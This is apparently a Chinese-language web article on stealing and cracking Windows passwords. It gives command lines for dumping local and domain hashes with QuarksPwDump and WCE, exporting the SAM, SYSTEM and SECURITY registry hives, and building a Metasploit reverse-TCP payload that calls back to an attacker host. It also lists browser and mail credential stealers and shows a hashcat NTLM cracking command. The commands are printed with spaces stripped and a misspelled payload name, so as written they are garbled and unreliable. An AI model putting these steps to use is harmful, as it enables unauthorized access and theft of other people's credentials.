您的位置 首页 > 产业综合

windows密码 Windows密码获取和破解

大家好,关于windows密码很多朋友都还不太明白,不过没关系,因为今天小编就来为大家分享关于Windows密码获取和破解的知识点,相信应该可以解决大家的一些困惑和问题,如果碰巧可以解决您的问题,还望关注下本站哦,希望对各位有所帮助!

本文只是简单的讲明密码获取和破解

具体的操作细节均以模糊或具体代码混淆等方式避开

如有兴趣请自行研究,本文不做细说~~~

Windows密码一般是以“哈希值”进行加密保存,我们获取破解密码哈希值就可以获得密码了~

密码获取工具:

gethash、gsecdump、QuarksPwDump、Pwdump、mimikatz、WCE……

QuarksPwDump:

是一款Windows下用户密码提取的开源工具,可以抓取Windows平台下多种类型的用户凭证,包括本地账户、域账户、缓存的域账户和Bitlocker的提取。

QuarksPwDump-dh1//导出本地哈希值\nQuarksPwDump-dhdc//导出内存中域账户哈希值\nQuarksPwDump-dhd//导出域哈希值(指定NTDS文件)\n

WCE:

是一款功能强大的Windows平台的内网渗透工具,可以列举登录会话,并且可以添加、变更、删除相关的凭证数据。是内网渗透的必备工具之一

wce-a//获取所有账户哈希值\n

reg命令:导出密码文件

通过执行reg命令将SAM、System、SECURITY等文件内容导出到文件中

regsavehklm\\samsam.hive\nregsavehklm\\systemsystem.hive\nregsavehklm\\securitysecurity.hive\n

命令执行后将会将文件保存在本地~

PowerShell获取:

PowerShell加载mimikatz模块获取密码,通过执行该ps脚本即可获取Windows密码

MSF反弹hashdump及mimikatz获取:

通过MSF生成反弹shell或直接溢出获取反弹shell,在MSF下执行hashdump即可~

>msfvenom-pwindows/metpreter/reverse_tcpLHOST=192.168.2.196LPORT=443-fexe-omet.exe\nMSF使用反弹处理模块

>useexploit/multi/handler\n>setPAYLOADwindows/meterpreter/reverse_tcp\n>setLHOST192.168.2.0\n>setLPORT443\n>exploit\n提权操作……

其它小工具

下列小工具在Windows平台运行就会获得相关的用户凭证……

mailpv:获取mail密码

mspass:获取MSN密码

IEPV:获取IE浏览器缓存密码

passwordfox:获取Firefox浏览器凭证

chromepass:获取谷歌浏览器凭证

无线网络密码获取工具

远程桌面密码获取:

rdpv——cmdkey/list——netpass.exe

破解密码哈希值

ophcrack破解:

导入哈希值,加载Tables,执行Crack~

hashcat破解:

将准备好的字典password.lst和需要破解的哈希值文件win.hast,复制到hashcat32程序文件夹下,执行命令破解:

hashcat-m1000-a0-owinpassok.txtwin.hashpassword.lst--username\n

-m1000表示破解密码类型为NTLM

-o[feilname].txt表示将破解后的文件输出到指定的文件中

--removewin.hash表示从win.hash移除破解成功的hash,密码中有username不能与remove参数同时使用,也可以单一破解

获取SAM和SYSTEM文件

文件通常在C:\\Windows\\System32\\config目录下存放(通常会使用系统盘PE系统进入并拿走文件),找到文件并拷贝:SAMSYSTEMSECURITY三个文件

使用SAMInside软件将三个文件导入到软件中,之后软件就会告知Hash值~

导出需要破解的哈希密码值,赋值拷贝到ophcrack软件中进行破解

windows密码的介绍就聊到这里吧,感谢你花时间阅读本站内容,更多关于Windows密码获取和破解、windows密码的信息别忘了在本站进行查找哦。

本站涵盖的内容、图片、视频等数据,部分未能与原作者取得联系。若涉及版权问题,请及时通知我们并提供相关证明材料,我们将及时予以删除!谢谢大家的理解与支持!

Copyright © 2023